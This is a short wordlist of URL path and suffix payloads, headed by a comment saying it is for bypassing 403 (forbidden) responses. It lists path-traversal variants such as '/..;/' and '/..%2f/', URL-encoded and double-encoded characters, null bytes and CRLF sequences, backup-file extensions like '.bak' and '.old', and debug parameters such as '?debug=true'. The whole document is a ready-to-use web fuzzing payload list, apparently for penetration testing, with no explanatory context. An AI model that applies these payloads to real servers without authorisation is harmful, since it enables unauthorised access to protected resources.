0
1
# This list for bypass 403 states ( bypass path 
/%2e/
/./
/_/
//
/..;/
/..%2f/
..;/
.html
?
??
~
.json
.bak
.old
.temp
/
%20
%09
/index.php
/static/..;/
%2e%2e
%2e/
..//
/403bypasser:
??/
//.../

#
///
////
/%2f/
/%2f//
/*
/*/
/%2e//
/%2e///
/.//
/.///
/.
/.//.
/.//./
%0d
%0d/
%0a
%0a/
%0b
%0b/
%0d%0a
%0d%0a/
%09/
%20/
/%20%20
/%20%20/
/../
/....//
/..\\
/....\\\\
/test../
/test..//
/test/../
/test/..//
???
..\;/
°/
#/
#/./
#test
%00
%0A
%0D
%25
%23
%26
%3f
%61
%2500
%2509
%250A
%250D
%2520
%2520%252F
%2525
%2523
%2526
%253F
%2561
&
-
.
..;
..\;
./
.css
.php
.random
.svc
.svc?wsdl
.wsdl
?WSDL
?debug=1
?debug=true
?param
?testparam
\/\/
debug
false
null
true
/..%3B/
;%2f..%2f..%2f
